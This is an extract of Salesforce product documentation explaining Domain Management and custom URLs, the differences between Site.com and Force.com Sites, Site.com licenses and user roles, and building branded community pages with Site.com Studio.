Domain Management Overview
Adding a Custom URL
Managing Domains and Custom URLs
Deleting a Domain
Deleting Custom URLs

Adding a Custom URL
Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“View Setup and Configuration”To view custom URLs:

“Customize Application” or “View Setup and Configuration”
plus either a Site.com Publisher license or “Create and Manage
Communities”

To add, edit, and delete custom URLs:

Once you’ve added domains to the Domain Management page, you can select your domain and site relationships by creating
a custom URL. A custom URL consists of the domain and a custom path. The same path name can be used on more than
one domain, but it can't be used more than once within the same domain. When adding a custom URL, the / is required and
indicates the root. You can add an additional path after the /, but you must at least use the / to indicate the root. For example,
if the domain name is https://oursite.com and the path is /products, the site URL is
https://oursite.com/products. If you added the custom URL to the root, the URL would be https://oursite.com.

If you want to set a preferred custom URL for authenticated pages and emails that links back to the site or community, then
select Site Primary Custom URL. This is only available on the root path for Force.com and Communities sites and not
available at all on Site.com sites. For Chatter Communities, if you don’t select a primary URL, then the first https custom
domain in the site is used for authenticated pages and emails. If there is no custom https domain, then your Force.com
domain is used.

To add a custom URL:

1. From Setup, click Domain Management > Custom URLs. Alternatively, click Domain Management > Domains and
click the domain name.

2. Click New Custom URL.
3. Enter a Domain name.
4. Enter a Site name.
5. Enter a unique path.
6. Click Save. Alternatively, click Save & New to add multiple Custom URLs.
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In the Custom URLs table, even though the domain name and path show in separate columns in the table, it is the combination
that make up the actual URL.

See Also:
Domain Management Overview
Adding a Domain
Managing Domains and Custom URLs
Deleting a Domain
Deleting Custom URLs

Managing Domains and Custom URLs
You can use Domain Management in Setup to manage all the certificates, custom URLs, and sites attached to a domain.

Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“View Setup and Configuration”To view domains:

“Customize Application” or “View Setup and Configuration”
plus either a Site.com Publisher license or “Create and Manage
Communities”

To add domains:

“Customize Application”To edit or delete domains:

Contact salesforce.comTo associate certificates with a domain:

User Permissions Needed

“View Setup and Configuration”To view custom URLs:

“Customize Application” or “View Setup and Configuration”
plus either a Site.com Publisher license or “Create and Manage
Communities”

To add, edit, and delete custom URLs:

You might want to add a new custom URL to an existing domain, rename a domain, or delete a custom URL from a particular
domain. The Domain Detail page allows you to manage the domains and URLs from one page. The top section contains
information about the domain and certificates. The lower section contains the a Custom URL related list for the domain.
Using this page you can:

• Edit the domain name and certificate — click Edit in the Domain Detail section.

• Delete the domain — click Delete in the Domain Detail section.

• Add new custom URLs — Click New Custom URL
• Edit existing custom URLs — Click Edit on a custom URL row.

• Delete custom URLs — Click Del on a custom URL row.
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• View the site if it is published — Click View on a custom URL row.

• Jump to a site — Click the site name below the Site Label.

• Jump to an attached certificate — click the certificate name next to Certificate and Key.

To access the Domain Detail page:

1. From Setup, click Domain Management > Domains.
2. From the Doman Name column, click the domain name.

Note:  If you have your domain set to use http, and you edit the domain to use https instead, you must republish
your Site.com sites.

See Also:
Domain Management Overview
Adding a Domain
Adding a Custom URL
Managing Domains and Custom URLs
Deleting Custom URLs

Deleting a Domain
You can delete domains from your organization using the Domain Management page.

Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”To delete domains:

You can’t delete a domain that is attached to a published site. You’ll need to unpublish all sites attached to the domain before
you can delete it. For Force.com sites, the domain is deleted immediately, and users no longer have access to any site connected
to that domain. But with Site.com sites, the domain remains active until you republish the site.

To delete a domain from your organization:

1. From Setup, click Domain Management > Domains.
2. Click Del next to the domain name.
3. Click OK.
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When you delete a domain with an unpublished site attached, it also deletes the custom URL associated with that site.

See Also:
Domain Management Overview
Adding a Domain
Adding a Custom URL
Managing Domains and Custom URLs
Deleting Custom URLs

Deleting Custom URLs
You can delete custom URLs from your organization using the Domain Management page.

Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“View Setup and Configuration”To view custom URLs:

“Customize Application” or “View Setup and Configuration”
plus either a Site.com Publisher license or “Create and Manage
Communities”

To add, edit, and delete custom URLs:

You can’t delete a URL that is attached to a published site. You’ll need to unpublish the site attached to the custom URL
before you can delete it. For Force.com sites, the URL is deleted immediately, and users no longer have access to any site
connected to that URL. But with Site.com sites, the URL remains active until you republish the site.

To delete a URL from a domain:

1. From Setup, click Domain Management > Custom URLs.
2. Click Del next to the URL name.
3. Click OK.

See Also:
Domain Management Overview
Adding a Domain
Adding a Custom URL
Managing Domains and Custom URLs
Deleting a Domain
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Site.com and Force.com Sites Overview
Site.com
Aimed at less technical users, Site.com is a Web content management system (CMS) that provides an intuitive drag-and-drop
environment to customize your community’s pages. Site.com makes it easy to build dynamic, data-driven Web pages quickly
and edit your content in real time. There’s no code required (although you can add custom code if you need to) but familiarity
with CSS and HTML helps.

• Design pixel-perfect, branded pages.
• Create public pages that anyone can access, or add private pages that you can add as a tab within your community.
• Build and iterate quickly using reusable page elements.
• Use ready-made forms to create web-to-lead forms or gather customer feedback.
• Create data-driven pages, such as product catalogs or other listings, using your organization’s data.

Force.com Sites
Suitable for developers with experience using Visualforce, Force.com Sites lets you to build custom pages and Web applications
by inheriting Force.com capabilities including analytics, workflow and approvals, and programmable logic. So if you are looking
to create sites programmatically using Apex and APIs, Force.com Sites is the product for you.

• Create public, branded pages that anyone can access.
• Leverage Visualforce to create private pages that you can add as a tab within your community.
• Write your own controllers, or extensions to controllers, using Apex code.
• Create custom login or self-registration pages.
• Build dynamic web applications, such as an event management application.

Features At a Glance
Still unsure which product to choose? Take a look at this table to learn more about each product’s features.

Force.com SitesSite.comFeature

Public pages

Authenticated pages*

Visualforce pages

Out-of-the-box login, self-registration, and error pages

Drag-and-drop environment

Reusable page elements

Pixel-perfect designs

IP restrictions

Access to data, such as cases, leads, and opportunities

Readymade forms
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Force.com SitesSite.comFeature

CMS

Programmatic page creation (using Apex, APIs, and
controllers)

Web applications

Analytics, reports, and workflows

*Available in Site.com for Communities users only

SITE.COM

Site.com Overview
Available for purchase in: Enterprise and Unlimited Editions

Available (with limitations) in: Developer Edition

Site.com is a Web content management system (CMS) that makes it easy to build dynamic, data-driven Web pages quickly,
edit content in real time, and manage your websites. From the Site.com tab in the Site.com app, you can launch Site.com
Studio, which provides a separate, dedicated environment for creating and editing pixel-perfect, custom websites. Site
administrators and designers can create and style Web pages, and add features such as navigation menus, images, and text
areas using drag-and-drop page elements, while ensuring the site's pages match the look and feel of the company's brand. And
content contributors, such as marketing users, can browse and update website content directly in a simplified Site.com Studio
environment. Additionally, websites built with Site.com benefit from running on salesforce.com's trusted global infrastructure.

Note:  The features available in Site.com Studio vary depending on whether you're a site administrator, designer, or
contributor.

The following examples illustrate a few ways to use Site.com:

• Create an event site—Advertise upcoming events, such as grand openings, launches, or sales kick-offs on a public event
site.

• Promote new products—Launch new products into the market with a promotional website that helps drive sales.

• Publish a support FAQ—Provide helpful information on a public website where customers can view solutions to their
issues.

• Create microsites and landing pages—Create temporary landing pages or targeted microsites for marketing campaigns.

• Create a recruiting website—Post job openings to a public site and allow visitors to submit applications and resumes.

• Publish a catalog of products—List all of your company's products on a public website, with model numbers and current
prices pulled dynamically from your organization.

• Post company press releases—Publish your company’s press releases and sort by publication date.
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System Requirements

To use Site.com Studio, we recommend:

• Mozilla® Firefox® or Google® Chrome for best performance. Windows® Internet Explorer® versions 6.0 and 7.0 are not
supported.

• Disabling the Firebug extension for Firefox, if installed, as it can impact performance.
• A minimum browser resolution of 1024x768.

See Also:
Setting Up Site.com Users
Planning and Implementing a Site.com Website
Using Site.com Studio as a Site Administrator or Designer
Using Site.com Studio as a Contributor

SETTING UP SITE.COM USERS

About Site.com Feature Licenses
Available for purchase in: Enterprise and Unlimited Editions

Available (with limitations) in: Developer Edition

To access Site.com, each user in your organization must have a Site.com feature license.

• The Site.com Publisher feature license allows the user to access Site.com Studio to create and style websites, control the
layout and functionality of pages and page elements, and add and edit content.

• The Site.com Contributor feature license allows the user to access Site.com Studio to edit site content only.

Consider what your users need to do in a site and purchase feature licenses accordingly. See the Site.com feature table for a
complete list of the capabilities that come with each feature license. After you purchase feature licenses, you can set up Site.com
users.

You can view the number of assigned feature licenses on your organization's profile.

Note:  Organizations using Unlimited or Enterprise Editions must purchase Site.com Publisher and Site.com
Contributor feature licenses separately. Additionally, a Site.com Published Site license is required for each site that’s
published to the Internet. For information on purchasing Site.com licenses, contact salesforce.com.

Developer Edition organizations contain two Site.com Publisher feature licenses and one Site.com Contributor feature
license. Developer Edition organizations can’t publish sites.

Communities users with the “Create and Manage Communities” permission are assigned the role of site administrator
in a community’s Site.com site. To let Communities users without the permission edit the site, you must purchase
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and assign either a Site.com Publisher or a Site.com Contributor feature license, and assign a user role at the site
level.

See Also:
About Site.com User Roles
Managing Site.com Users and Roles

Setting Up Site.com Users
Available for purchase in: Enterprise and Unlimited Editions

Available (with limitations) in: Developer Edition

User Permissions Needed

“Manage Users”To create or edit users:

Before users can access Site.com, you must allocate a Site.com feature license to each user and assign a user role at the site
level. The features available when editing a site in Site.com Studio vary depending on these settings.

First, review the Site.com feature table for detailed information on the feature license, permissions, and role required for each
user.

After you’ve determined the appropriate access level required:

1. Allocate a feature license to the user by editing the user’s profile. To allocate:

• A Site.com Publisher feature license, select the Site.com Publisher User checkbox.
• A Site.com Contributor feature license, select the Site.com Contributor User checkbox.

After you allocate a feature license, users can access Site.com in the Force.com app menu in the Salesforce header.

Note:  If the checkboxes don't appear, verify that Site.com is enabled for your organization. See About Site.com
Feature Licenses on page 3280.

2. Ensure the “View Setup and Configuration” permission is enabled. All users who create or edit websites in Site.com Studio
need this permission.

3. Additionally, ensure that at least one user in your organization has both a Site.com feature license and the “Manage Users”
permission. This way, someone can always reallocate user roles if a site’s users are accidentally deleted.

Warning:  The “Manage Users” permission is powerful. It allows a user to manage all other users in your
organization and not just Site.com.

4. Add users and assign user roles within a site. (When a user with the Site.com Publisher feature license creates a site, the
user is automatically allocated the role of site administrator at the site level.)
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The feature license, permissions, and user role all determine what a user can do in each site. For example, to create an
administrative user who can manage all sites in your organization, assign a Publisher feature license and assign the role of site
administrator at the site level.

For users who need only limited access to edit site content, but no administrative access, assign a Contributor feature license
and a contributor role at the site level.

Alternatively, to create a user who can manage roles in a site, but without the ability to publish, assign a Publisher feature
license, the “Manage Users” permission, and the designer role at the site level.

See Also:
About Site.com User Roles

About Site.com User Roles
Available for purchase in: Enterprise and Unlimited Editions

Available (with limitations) in: Developer Edition

Each Site.com user must have a user role assigned at the site level, which controls what each user can do in a site. Users can
have only one role per site, but their roles can vary between sites. For example, a person can be a site administrator on one site
and a contributor on another.

To manage user roles in a site, you must either be the site administrator for that site, or have a Site.com feature license and
the “Manage Users” permission.

Note: Communities users with the “Create and Manage Communities” permission are assigned the role of site
administrator in a community’s Site.com site. However, they don’t appear in the User Roles section on the Overview
tab of Site.com Studio.

Users can have one of three roles at the site level:

• Site administrator—Site administrators are users who can create and manage all site content. They can create sites, templates,
style sheets, and pages, and also set up domains, publish sites, and assign user roles. This role requires the Site.com Publisher
feature license.

• Designer—Designers have the same control over site content as site administrators, but they can’t manage domains or
publish sites. By default, they can’t assign roles unless they have the “Manage Users” permission. This role requires the
Site.com Publisher feature license.

• Contributor—Contributors have the most restricted access to content and can typically just edit page text and images. By
default, they can’t assign roles unless they have the “Manage Users” permission. This role requires the Site.com Contributor
feature license.
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See the Site.com feature table on page 3284 for a detailed list each user role’s capabilities.

See Also:
Managing Site.com Users and Roles
Setting Up Site.com Users
About Site.com Feature Licenses

Managing Site.com Users and Roles
Available for purchase in: Enterprise and Unlimited Editions

Available (with limitations) in: Developer Edition

User Permissions Needed

Site.com Publisher User field enabled on the user detail
page

AND

Site administrator role assigned at the site level

To manage Site.com users:

After you create a site, you can add other users and assign roles to them. If you haven’t assigned Site.com feature licenses to
your users, you won’t be able to add them to a site.

Note: Communities users with the “Create and Manage Communities” permission are assigned the role of site
administrator in a community’s Site.com site. However, they don’t appear in the User Roles section on the Overview
tab of Site.com Studio.

When assigning a user role, be sure to add one that’s compatible with the user’s Site.com license. When users log into Site.com,
their licenses are checked against the role assigned to them at the site level. If the license doesn’t allow the permissions associated
with the role, then the user is given the permissions associated with the license. For example, if a user has a Site.com Contributor
feature license, but is assigned a role of site administrator, they will only have Contributor permissions regardless of the assigned
role.

To add users and assign roles:

1. On the Overview tab in Site.com Studio, click Site Configuration > User Roles.
2. Click Add Users.
3. In the Available Users section, highlight the user you want to add.
4. Select the role from the Add as drop-down list.
5. Click the arrow to move the user to the Selected Users section.
6. Click Save.

To delete users:

1. In the User Roles view, select the user.
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2. Click  > Remove.
3. Click OK.

To change a user’s role:

1. In the User Roles view, hover over the user’s role.
2. Click the arrow to display all the roles.
3. Select the new role.

To delete or change the role of a group of users at the same time, use Bulk Actions.

1. In the User Roles view, select the check box beside each user’s name.
2. Click Bulk Actions.
3. Select the action.
4. Click Apply.

Note:  When updating the roles of several users at once, you can only assign the same role to all selected users.

See Also:
Setting Up Site.com Users
Planning and Implementing a Site.com Website
About Site.com Features

About Site.com Features
Available for purchase in: Enterprise and Unlimited Editions

Available (with limitations) in: Developer Edition

The features available when editing a site in Site.com Studio vary depending on your Site.com feature license and also your
user role for that particular site.

This table lists the required feature licenses, permissions, and roles for many of the Site.com Studio features.

Note:

• Communities users with the “Create and Manage Communities” permission are assigned the role of site
administrator in a community’s Site.com site.

• You can’t create, delete, duplicate, export, or import community sites in Site.com.

Site.com Studio Feature Requirements

PermissionsSite.com Studio User RoleFeature LicenseFeature

“Manage Users”Assign feature license to user profile
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Site.com Studio Feature Requirements

PermissionsSite.com Studio User RoleFeature LicenseFeature

Additionally, any user
with a Site.com feature

Site administratorPublisherAdd users and roles at the site level

license and the
“Manage Users”
permission.

Site administrator or designerPublisherEnable contributors to add pages and edit
content blocks and graphics

Users who create a site are
automatically added to that site as a
site administrator.

PublisherCreate websites

Site administrator or designerPublisherDelete websites

Users who import a site are
automatically added to the new site
as a site administrator.

PublisherImport websites

Site administrator or designerPublisherExport websites

Site administrator or designerPublisherDuplicate websites

Site administratorPublisherManage domains

(Unavailable for Developer Edition)

Site administratorPublisherAdd and edit IP restrictions

Site administratorPublisherPublish changes to the live website

(Unavailable for Developer Edition)

Site administrator or designerPublisherCreate page templates

Site administrator or designer

Contributor only if enabled by the
site administrator or designer in the
page template’s Properties pane.

Publisher or
Contributor

Create website pages

Site administrator or designerPublisherCreate and modify style sheets

Site administrator or designerPublisherModify layout and design, and add page
elements

Site administrator or designerPublisherAdd data repeaters and other data-bound
page elements

“Manage Users” and
“Customize
Application”

Site administrator or designerPublisherModify the Guest User profile to set public
access permissions to Salesforce objects
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Site.com Studio Feature Requirements

PermissionsSite.com Studio User RoleFeature LicenseFeature

Any assigned rolePublisher or
Contributor

Import assets, such as images and files

Site administrator or designer

Contributor only if enabled by the
site administrator or designer in the
page template’s Properties pane.

Publisher or
Contributor

Edit content and images

Any assigned rolePublisher or
Contributor

Preview website pages

GETTING STARTED WITH SITE.COM

Planning and Implementing a Site.com Website
Available for purchase in: Enterprise and Unlimited Editions

Available (with limitations) in: Developer Edition

User Permissions Needed

Site.com Publisher User field enabled on the user detail
page

To create or import Site.com sites:

Site.com Publisher User field enabled on the user detail
page

AND

Site administrator or designer role assigned at the site level

To build, edit, and manage Site.com sites:

Site.com Contributor User field enabled on the user
detail page

AND

Contributor role assigned at the site level

To edit only content in Site.com sites:

There are many approaches to building a website. The process that best suits you depends on many factors, such as the size
of your team and the tasks you're responsible for.
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If you're a site administrator or designer, you may be involved in every stage, including adding and maintaining the site's
content. Alternatively, you may have contributors who add, edit, and maintain this content. And if you're a contributor, you
may be responsible for editing and updating all of the site's content, or you may work with other contributors, designers, and
site administrators to bring the site to completion.

This topic describes the various stages involved in creating a site with Site.com.

• Plan the Site Design and Page Layout (Site administrator or designer)—Before building the pages of the site, spend time
planning the site design and basic layout. This stage is key to ensuring a consistent look and feel with the minimum amount
of effort. From a hierarchical point of view, think about how many pages you need and whether they'll have subpages. Also
consider how you want site visitors to navigate around your site.

Next, plan the layout of the pages and identify the common elements that every page will have. In this example, the site
has a header section that includes the company's logo and menu (1), and a footer section (2). However, the main section
of the home page (3) differs from the rest of the site pages (4). Take note of these similarities and differences, because they
will affect how you create your site pages.

• Create the Site (Site administrator or designer)—Once you've completed the planning stage, you're ready to get started!
Log into the Site.com app and go to the Site.com tab, where you can create your first site. Your new blank site opens in
Site.com Studio, a powerful environment for building the pages of your site.

Note: Only users with the Site.com Publisher User field enabled on their user detail page can create and
import sites.

• Import Assets (Site administrator or designer)—If you're working with a design agency, they may provide all of the files
and assets you need, including a CSS style sheet. If you've created your own design, cut up the design and collect the assets,
images, and files you plan to use in the site. Import the assets into Site.com Studio, where they appear in the Assets section
of the Overview tab.

• Create a Page Template (Site administrator or designer)—Once you've decided on the layout, the quickest and most
effective method is to use page templates to build the basic layout and then base your site pages on it. Try to keep the
design of your main page template simple to make it easier to modify in the future. For more complicated site designs,
such as the example graphic, you can use the main page template as the basis for a child template to achieve maximum
flexibility. When you create your page template, you can choose from predesigned layouts that include headers, footers,
and columns, or you can create a blank page template.

• Lay Out the Page (Site administrator or designer)—After you create the page template, you can modify the layout further
to match the design of your site.

• Create the Site Pages (Site administrator or designer)—Using the template as a base, you can quickly create the site pages,
which automatically inherit all the elements of the page template. Or if you need a standalone page that doesn't follow the
site's overall design, you can create a blank page instead.
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• Add Features and Page Elements (Site administrator or designer)—Use Site.com's prebuilt page elements to add features
such as navigation menus, images, and data services, and include content blocks that contributors can edit. And add
interactive, animated effects using events and actions.

• Make Your Website Look Good (Site administrator or designer)—Take advantage of cascading style sheets (CSS) to
develop the look and feel of your website. If you're not completely up to speed with CSS, the Style pane provides an easy,
visual way to create and manage styles. Or if you're a CSS expert who likes to get straight into the code, you can hand-code
the site's style sheets.

• Add and Edit Content (Contributor)—At this stage, if you're a contributor, the site is usually ready for you to add and
edit content such as text, images, videos, and hyperlinks. And as you work, you can upload any images or files you need.

• Review and Test the Site (Contributor, designer, or site administrator)—Testing the changes to the pages of your site
happens throughout the development cycle. As a contributor, designer, or site administrator, you should always preview
your changes to ensure they display as expected in a browser. And if you're a site administrator or designer, you can send
a preview link to the site's reviewers so they can review the finished product before it goes live.

• Publish the Site (Site administrator only)—After testing is complete, you're ready to go live with your new site. Just set
the site's domain information and then publish your changes to make your site live!

See Also:
Using Site.com Studio as a Site Administrator or Designer
Using Site.com Studio as a Contributor

Site.com Tab Overview
Available for purchase in: Enterprise and Unlimited Editions

Available (with limitations) in: Developer Edition

User Permissions Needed

Site.com Publisher User field enabled on the user detail
page

To create or import Site.com sites:

Site.com Publisher User field enabled on the user detail
page

AND

Site administrator or designer role assigned at the site level

To build, edit, and manage Site.com sites:

Site.com Contributor User field enabled on the user
detail page

AND

Contributor role assigned at the site level

To edit only content in Site.com sites:

If you can't see the Site.com tab, go to the Site.com app. It's available in the Force.com app menu in the Salesforce header.
Then click the Site.com tab to view the list of your Site.com sites. From this page you can:
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• Click New to create or import a site. Only users with the Site.com Publisher User field enabled on their user detail
page can create and import sites.

• Filter the sites you see by selecting a predefined list from the drop-down list. My Sites shows the sites you can access and
your role. All Sites shows all the sites in your organization even if you don’t have access to some of them.

• Click Edit next to a site to open it in Site.com Studio.

• Click Preview next to a site to see how it looks when rendered in a browser window.

• Click  next to a site to duplicate, export, or delete it. Only users with the Site.com Publisher User field enabled
on their user detail page and the role of site administrator or designer can duplicate, export, and delete sites. If a site has
been published, you can't delete it until you take it offline.

• See the status of your site.

◊ In Development—The site has never been published.

◊ Published—The site has been published at least once.

• Click the title of any column to sort your site list. By default, sites are sorted by name.

Note: You can’t create, delete, duplicate, export, or import community sites in Site.com.

See Also:
Using Site.com Studio as a Site Administrator or Designer
Using Site.com Studio as a Contributor
Planning and Implementing a Site.com Website
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Using Site.com Studio as a Site Administrator or Designer
Available for purchase in: Enterprise and Unlimited Editions

Available (with limitations) in: Developer Edition

User Permissions Needed

Site.com Publisher User field enabled on the user detail
page

AND

Site administrator or designer role assigned at the site level

To build, edit, and manage sites Site.com sites:

Site.com Publisher User field enabled on the user detail
page

AND

Site administrator role assigned at the site level

To manage domains and publish Site.com sites:

Watch a Demo: Building a Website with Site.com (3:02 minutes)

Site.com Studio provides a dedicated site-building environment for site administrators and designers. Using the many features
available, you can:

• Create page templates to base your site pages on.

• Create site pages.

• Import assets, such as images and files.

• Edit the site’s style sheet or create new style sheets.

• View and edit a page or template.

• Add page elements to your site pages to provide features and functionality.

• Use data services to connect to Salesforce objects to retrieve and display, or to submit data.

• Create custom widgets that you and other users can reuse throughout the site.

• Create events to add interactive and animated effects to your website.

• Add IP restrictions to control site visitors’ access to the pages, page templates, folders, and assets in your site.

• Add URL redirects to inform users and search engines if site content has moved

• Create folders to organize your site content.

• Preview your site or generate an anonymous preview link to send to other users.

• Manage the domain information for your site.

• Publish your recent changes to the live site.

• Duplicate, import, and export sites.
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Note:

• Designers can’t manage domains or publish content.

• You can’t create, delete, duplicate, export, or import community sites in Site.com.

See Also:
Understanding the Site Administrator and Designer's Overview Tab
Planning and Implementing a Site.com Website
Site.com Tab Overview

Using Site.com Studio as a Contributor
Available for purchase in: Enterprise and Unlimited Editions

Available (with limitations) in: Developer Edition

User Permissions Needed

Site.com Contributor User field enabled on the user
detail page

AND

Contributor role assigned at the site level

To edit only content in Site.com sites:

Watch a Demo: Editing and Managing Content with Site.com (2:53 minutes)

Site.com Studio provides a dedicated content-editing environment for contributors, where you can:

• Open a page to edit it.

• Create site pages, if your site administrator or designer has enabled page creation.

• Edit the page text.

• Add images and videos to pages.

• Create hyperlinks and anchors.

• Import assets, such as images and files.

• Preview the site in a browser window.

See Also:
Understanding the Contributors's Overview Tab
Planning and Implementing a Site.com Website
Site.com Tab Overview
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Understanding the Site Administrator and Designer's
Overview Tab

Available for purchase in: Enterprise and Unlimited Editions

Available (with limitations) in: Developer Edition

User Permissions Needed

Site.com Publisher User field enabled on the user detail
page

AND

Site administrator or designer role assigned at the site level

To build, edit, and manage Site.com sites:

Site.com Publisher User field enabled on the user detail
page

AND

Site administrator role assigned at the site level

To manage domains and publish Site.com sites:

Site.com Publisher User field enabled on the user detail
page

AND

Site administrator role assigned at the site level

OR

“Manage Users”

To manage user roles:

As a site administrator or designer, when you open a site in Site.com Studio, it opens on the Overview tab. Here you can
access and manage the site’s components and configure the site’s properties.
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• Select a view (1) on the Overview tab to view its contents (2).

◊ All Site Content—Create folders to organize your site content. In this view, you can also create pages, templates, and
style sheets, and import assets.

◊ Site Pages—Create site pages, open and edit pages, access page options, create site map links, and organize the site

map. You can also switch between the default site map view ( ) and the list view ( ).
◊ Page Templates—Create page templates to base your site pages on, open and edit existing templates, and access template

options.
◊ Style Sheets—Edit the site’s style sheet or create new style sheets.

◊ Assets—Import and manage assets, such as images and files.

◊ Widgets—Build custom widgets that can you and your team can reuse throughout the site.

◊ Trash Can—Retrieve deleted items. When you delete a page, template, stylesheet, or asset, it goes into the trash can.
Deleted items remain in the trash can indefinitely. Retrieved items are restored to their original location. If the original
location no longer exists, they are restored to the top-level root directory.

◊ Recent Changes—View information about the most recently modified files.

◊ Publish History—View information about the published files.

◊ Site Configuration—Configure site properties, add IP restrictions, create URL redirects, manage domain information,
and manage user roles.

• Use the toolbar (3) to:

◊ Import assets, such as images and files.

◊ Duplicate the site or create a new one.

◊ Publish recent changes.

◊ Preview your site or generate an anonymous preview link to send to other users.

• Use the site's pull-down menu (4) to:
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◊ Open recently accessed sites.

◊ Exit Site.com Studio and return to Salesforce.

◊ Create a new site.

◊ Duplicate the site.

Note: You can’t create, delete, duplicate, export, or import community sites in Site.com.

See Also:
Using Site.com Studio as a Site Administrator or Designer
Planning and Implementing a Site.com Website
Site.com Overview

Understanding the Contributors's Overview Tab
Available for purchase in: Enterprise and Unlimited Editions

Available (with limitations) in: Developer Edition

User Permissions Needed

Site.com Contributor User field enabled on the user
detail page

AND

Contributor role assigned at the site level

To edit only content in Site.com sites:

As a contributor, when you open a site in Site.com Studio, it opens on the Overview tab. Here you can access and edit the
site’s pages and content, and import images and files.
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• Select a view (1) on the Overview tab to view its contents (2).

◊ All Site Content—View all of the site’s pages, images, and files.

◊ Site Pages—View and edit pages, or create site pages, if available.

◊ Assets—Import assets, such as images and files.

◊ Recent Changes—View information about the most recently modified files.

◊ Site Configuration—Manage user roles in the site. This is available only if you have the “Manage Users” perm.

• Use the toolbar (3) to:

◊ Import assets, such as images and files.

◊ Preview the site in a browser window.

• Use the site's pull-down menu (4) to:

◊ Open recently accessed sites.

◊ Exit Site.com Studio and return to Salesforce.

See Also:
Using Site.com Studio as a Contributor
Site.com Overview
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USING SITE.COM WITH COMMUNITIES

Customizing Communities With Site.com Overview
Each community has one associated Site.com site that lets you add custom, branded pages to your community. By default,
Site.com pages are publicly available and don’t require login, but you can also create private pages that only community members
can access.

For more detailed information about using Site.com, check out the online help.

Before You Begin

Communities users with the “Create and Manage Communities” permission automatically have full site administrator access
to a community’s Site.com site. To let Communities users without the permission edit the site, you must purchase and assign
either a Site.com Publisher or a Site.com Contributor feature license, and assign a user role at the site level.

See About Site.com User Roles on page 3282.

Tips and Considerations

• Communities users with the “Create and Manage Communities” permission are assigned the role of site administrator in
a community’s Site.com site. However, they don’t appear in the User Roles section on the Overview tab of Site.com Studio.

• You can’t create, delete, duplicate, export, or import community sites in Site.com.
• When working with data-bound page elements, such as data repeaters and forms, keep in mind that the objects listed may

not be available to site visitors. For authenticated visitors, object access on public and private pages is controlled by their
user profiles. For unauthenticated visitors, object access on public pages is controlled by the site’s guest user profile.

• When adding forms to authenticated community pages in Site.com, set the current user for Salesforce objects that require
the Owner ID field. Setting the current user (as opposed to the default guest user) lets you identify the authenticated user
when the form is submitted. To set the current user for the Owner ID field, select the field in the form, click Configure
under Field Properties in the Properties pane, select Global Property as the source, and select Current userID as
the value.

• The home page and 404 page you specify for Site.com Community sites in Site Configuration set the home and 404 pages
for the Site.com Community site only. Community home pages are set in the Tabs section of the Create Community
wizard. Community error pages are specified in Force.com Setup, under Pages.

• When your Site.com Community site is offline, users are redirected to the Page Not Found page defined in Force.com
Setup, under Pages.

See Also:
Using Site.com to Customize Your Community
Salesforce Communities Overview
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Using Site.com to Customize Your Community
Available for purchase in: Enterprise and Unlimited Editions

Available (with limitations) in: Developer Edition

User Permissions Needed

“Create and Manage Communities”

OR

Site.com Publisher User field enabled on the user detail
page

AND

Site administrator or designer role assigned at the site level

To build, edit, and manage a community’s custom pages:

Communities users can use Site.com to build custom, branded pages for a community. There are many approaches to building
custom pages for your community, but these are some of the typical stages involved:

• Import Assets—Collect the assets, images, and files you plan to use on your custom page. Import the assets into Site.com
Studio, where they appear in the Assets section of the Overview tab.

• Create Branded Pages—The quickest and easiest way to create branded pages is to use the Community Template, which
is automatically included with all Site.com community sites. When you create a new page based on the Community
Template, the page includes all of the branded styles in your community, including the community’s header and footer. If
you want even more control over the look and feel of your community page, you can create your own page template, drag
community headers and footers to it from the Widgets section of the Page Elements pane, and add other community
styles.

• Use Branded CommunityStyles—Develop the look and feel of your custom pages by using the CommunityBranding
style sheet, or by creating branded community styles in your own cascading style sheets (CSS). If you're not completely up
to speed with CSS, the Style pane provides an easy, visual way to create and manage styles. Or if you're a CSS expert who
likes to get straight into the code, you can hand-code community styles right in your own style sheets.

• Create Public Pages—Using the template as a base, you can quickly create pages, which automatically inherit all the
elements of the page template. Or if you need a standalone page that doesn't follow the overall design, you can create a
blank page instead.

• Make Pages Private—By default, any page you create in Site.com Studio is publicly available. However, you can make
pages private so that only logged-in Communities users can access them.

• Add Features and Page Elements—Use Site.com's prebuilt page elements to add features such as navigation menus,
images, and content blocks. Retrieve data from your organization’s objects and dynamically display it on your site pages
using data repeaters and data tables. Alternatively, gather and submit data from visitors using forms.

• Add and Edit Content—At this stage, the page is usually ready for you to add and edit content such as text, images, videos,
and hyperlinks. And as you work, you can upload any images or files you need.

• Review and Test the Page—Testing the changes to your page happens throughout the development cycle. You should
always preview your changes to ensure they display as expected in a browser. You can also send a preview link to reviewers
so they can review the finished product before it goes live.
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• Publish the Page—After testing is complete, you're ready to make the page available to your community by publishing
your changes.

• Add Authenticated Pages to Your Community’s Tab—Now that the page is tested and published, if you’re working with
authenticated pages, the final step is to add the page to a tab in your community.

See Also:
Customizing Communities With Site.com Overview
Salesforce Communities Overview
Branding Your Community

CREATING BRANDED PAGES IN SITE.COM

Creating Branded Pages Overview
When you create a new Community site, Salesforce automatically creates a new Site.com site and associates it with your
community.

Available for purchase in: Enterprise and Unlimited Editions

Available (with limitations) in: Developer Edition

With Site.com Community sites you can:

• Use the branded Community template to create Site.com pages for your community.

• Use the CommunityBranding style sheet to style Site.com pages using CSS.

• Create your own community CSS styles using a number of available Network namespace expressions.

Creating Branded Pages from the Community Template
Site.com Community sites include a branded template that you can use to create new community site pages.

Available for purchase in: Enterprise and Unlimited Editions

Available (with limitations) in: Developer Edition
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User Permissions Needed

“Create and Manage Communities”

OR

Site.com Publisher User field enabled on the user detail
page

AND

Site administrator or designer role assigned at the site level

To build, edit, and manage a community’s custom pages:

The styles for the Community Template come from the CommunityBranding style sheet, which is automatically included
for all new Site.com Community sites.

To create branded pages from the Community Template:

1. On the Site.com Overview tab, hover over Site Pages and click New.
2. Type the new community page name. Page names can’t include spaces or special characters, such as #, ?, or @.
3. Make sure Community Template is selected for the page template.
4. Click Create.

Note:

• Community branding options, such as headers, footers, and page colors, are set from the Manage Communities
page in Force.com Setup.

• Empty community headers and footers, or headers that contain only images, won’t work in Site.com. Be sure to
specify customized HTML blocks for your community headers and footers if you’re creating Site.com pages from
the Community Template, or creating community headers and footers using Network namespace expressions.

• Community headers and footers are available as widgets in Site.com community pages. To add a community
header or footer to a blank page, drag it to the page from the Widgets section of the Page Elements pane.

See Also:
Getting Started With Communities
Creating Branded Pages Overview
Viewing the CommunityBranding Style Sheet
